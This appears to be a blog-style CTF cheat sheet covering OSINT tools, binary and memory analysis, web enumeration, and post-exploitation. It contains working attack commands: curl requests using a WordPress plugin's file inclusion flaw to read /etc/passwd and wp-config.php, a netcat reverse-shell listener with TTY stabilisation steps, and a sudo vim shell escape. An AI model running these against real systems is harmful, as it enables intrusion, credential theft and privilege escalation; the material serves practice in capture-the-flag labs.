This cheat sheet provides many tools, tips and tricks that can be useful in CTF (capture the flag) challenges.

If you're ever stuck on an OSINT challenge, look at the OSINT Framework website for a tool that you can use to run your breadcrumb through.

If you want to know who an email address is registered to, use the EPIEOS Email Lookup to run an email address and gain further intel. The site also runs the email through holehe and returns results from other common online services that the email address is used on.

Use this especially for Gmail accounts, as the tool will return the Google account details for that address. This also works for Google Workspace (G Suite) addresses.

Also check out OH SHINT! for more OSINT resources.

When looking at a file that's not immediately obvious as to what it is, run the file command against it and you'll be given a best guess as to what the file is.

mk@0x01:~$ file cmus
cmus: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=d840331586ee2dab927367939ac426fb10a2a0ea, for GNU/Linux 3.2.0, stripped

The example above is the output for the cmus music player, look at your own output for what to reach for next.

Shortcut: If the file output references .NET or Mono, you have a .NET binary and should jump straight to using dnSpy or ilSpy to disassemble and/or decompile the binary.

There are several ways to go about static analysis when dealing with binaries.

• You can hexdump the binary data
• You can use a decompiler or disassembler to see the assembly code
• You can run strings to dump out any text strings from the binary and see if anything stands out
• You can run the binary through a tool like radare2 or Cutter to examine the contents of the binary.

Installing and running Cutter will give you the best of all of these, as you can see all of the above information within one utility. You still have the option of dropping to the command line and analysing the bits that way, but if you're after a single place to extract the above data, Cutter may be the best tool for you.

The dynamic analysis is more variable in its execution, as you're literally running the binary and looking at its activity via a debugger. The tools you use will depend on the inteneded operating system and CPU architecture, as well as the source programming language and the compiler used. There are many debuggers available for Windows (IDA Pro, SoftIce, Immunity Debugger), and Linux typically uses the GCC libraries and the gdb binary to debug ELF binaries.

Note: DFIR is not only about memory analysis. More complex CTF challenges can require you to have some experience in reverse engineering in order to capture the flag. In TamilCTF 2021, the Ransomware challenge implemented a fake flag process part-way through the challenge that was designed to trip up players. Getting the true flag required analysing files in Ghidra and piecing together components of the flag. Here's the writeup on that challenge.

Analysing memory files can be done in several ways, but one of the most complete toolkits for the job is the Volatility Framework. Volatility has a plethora of built-in features and community plugins dedicated to memory analysis and supports memory dumps from most Windows, MacOS and Linux OSes. Check out the above writeup for the Ransomware challenge to see what's possible with the framework.

Sometimes you'll come across a website in a CTF that gives you another breadcrumb, but no indication as to what to do next. These are some tools you can use to get some more info on the target site and perform further enumeration.

Note: The syntax used here is for feroxbuster, use the syntax of dirbuster/gobuster if you want to use that instead.

If you fingerprint a site and find out that it's a WordPress install, use wpscan to interrogate the site and find potential vulnerabilities. If the output of the scan shows vulnerabilities, search for those vulns in ExploitDB or via SearchSploit to learn more about how to conduct that exploit. Common WordPress exploits generally result in some form of RCE (to get a reverse shell) or to reveal data outside the web server root directory. For example, the Spritz 1.0 plugin is vulnerable to both LFI (Local File Inclusion) and RFI (Remote File Inclusion).

# Show the contents of /etc/passwd
mk@0x01:~$ curl http://192.168.0.73/wordpress/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../etc/passwd

# Show the contents of wp-config.php
mk@0x01:~$ curl http://192.168.0.73/wordpress/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../wp-config.php

This type of attack can often be used to find a set of credentials to gain access to the WP Admin dashboard, which you can then use to inject code to spawn a reverse shell, or run another payload generated by metasploit. Once you have a shell on the target server, generally the next step is some form of privilege escalation. Refer to GTFOBins or PEASS-ng for how you can escalate.

Here's a basic listener to spawn the reverse shell.

mk@0x01:~$ nc -lnvp 9999

Ports are arbitrary, just make sure that you set both the target IP and port in the reverse shell payload to match your attacking machine. For HTB/THM boxes this would generally be the IPv4 address of the tun0 interface. Here's how to easily get that:

mk@0x01:~$ ip -4 a s tun0 | grep -Po 'inet \K[\d.]+'

Decompiling application using APKtool is always good, but it won't give you a clear or readable output. Getting a JAVA decomplied output is really helpful. You can use Skylot's Jadx to decompile application into Java and use its GUI for complete understanding of Android application.

Going back to that nc listener for a second:

mk@0x01:~$ nc -lnvp 9999

Once the reverse shell connects and you have the reverse shell, there are still elements of a true shell missing.

• Some commands like su and ssh require a proper terminal to run
• Shells in netcat don't handle SIGINT correctly
• Stderr normally isn't displayed, so no error output in the reverse shell
• You can't use text editors like vim properly
• You have no job control
• You have no command history
• You have no tab completion
• If you accidentally CTRL+C in the listener, you'll kill the listener and the shell with it.

Basically, the shell is fragile and dumb, and it needs to be stabilised if you need anything remotely close to persistence. There are many ways to generate a reverse shell, with out without tools like msfvenom, that will spawn the shell for you to catch. As such, I'm only concerned with stabilising the shell once we've caught it with netcat.

If the victim server has Python installed, we can spawn a new shell prompt with the following command:

python -c 'import pty; pty.spawn("/bin/bash")'

This will give you a nicer prompt, as well as being able to run commands like su without any problems.

You can use upgrade the dumb netcat shell to a full TTY with the following process:

1. Spawn a new PTY via Python just like before, and then background it by pressing CTRL+Z.

mk@0x01:~$ nc -lnvp 9999
listening on [any] 9999 ...
10.0.3.7: inverse host lookup failed: Unknown host
connect to [10.0.3.4] from (UNKNOWN) [10.0.3.7] 57202
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@focal64:/tmp$ ^Z
[1]+ Stopped                nc -lnvp 9999
mk@0x01:~$

2. While the shell has been sent to the background, check the current terminal and STTY info so we can force the connected shell to match it.

mk@0x01:~$ echo $TERM
xterm-256color

mk@0x01:~$ stty -a
speed 38400 baud; rows 38; columns 116; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>; eol2 = <undef>; swtch = <undef>; start = ^Q;
stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; discard = ^O; min = 1; time = 0;
-parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
-ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc -ixany -imaxbel iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho -extproc

The info we need is the TERM type (xterm-256color) and the size of the current TTY (rows 38; columns 116).

3. While the shell is still backgrounded, set the current STTY to raw and tell it to echo the input characters.

stty raw -echo

When changing the shell to a raw stty, things are gonna look weird and you the next commands won't be visible.

4. Foreground the shell with fg and reinitialise the terminal with reset. When foregrounding the shell, you'll see the netcat command appear again, this is normal as it's showing the command for the job you foregrounded.

mk@0x01:~$ stty raw -echo
mk@0x01:~$ nc -lnvp 9999
                        reset

5. Finally, set the shell to match your shell from the info gathered earlier.

www-data@focal64:~$ export SHELL=bash
www-data@focal64:~$ export TERM=xterm-256color
www-data@focal64:~$ stty rows 38 columns 116

The end result is a fully interactive TTY with all features we want and expect - all over a netcat connection!

My standard Nmap recon generally starts with the following:

mk@0x01:~$ export ip = 1.2.3.4
mk@0x01:~$ export ports = $(nmap -p- --min-rate=1000 -T4 $ip | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

mk@0x01:~$ nmap -sC -sV -oN nmap/initial -p$ports $ip

Shout out to John Hammond for showcasing this in many a video.

If you can run vim as a super user via sudo, it doesn't drop elevated privileges when spawning a shell from vim itself.

sudo vim -c ':!/bin/sh'

If you're in vim already:

:set shell=/bin/sh
:shell

The above will spawn a new shell. Then jump into Bash and have at it :)

Here are some of popular websites for practicing your CTF skills, all of them are having a great set of challenges including all difficulty level .

• Pico CTF
• Ctflearn
• W3challs
• Hacker101
• Hax.tor